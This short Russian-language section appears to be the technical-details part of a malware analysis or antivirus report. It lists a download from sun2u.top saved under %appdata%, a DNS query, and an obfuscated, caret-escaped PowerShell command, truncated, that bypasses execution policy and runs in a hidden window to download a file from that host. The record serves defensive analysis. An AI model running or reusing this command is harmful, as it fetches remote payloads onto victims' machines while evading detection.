Техническая информация
- http://sun2u.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poW^E^rS^HElL^.^eXe -eXECu^tIoNPo^LicY^ B^YPaSs^ -^nOpR^Of^IL^e -wiNDoW^sTYlE hIddEn^ ^(^New-o^BJE^C^T ^S^y^stem.N^et.W^E^b^c^Li^eN^t)^.D^owNlO^a^d^F^I^l^e(^'http://sun2u.top/...
- DNS ASK su##u.top
- '<SYSTEM32>\cmd.exe' /C "poW^E^rS^HElL^.^eXe -eXECu^tIoNPo^LicY^ B^YPaSs^ -^nOpR^Of^IL^e -wiNDoW^sTYlE hIddEn^ ^(^New-o^BJE^C^T ^S^y^stem.N^et.W^E^b^c^Li^eN^t)^.D^owNlO^a^d^F^I^l^e(^'http://sun2u.top/...' (со скрытым окном)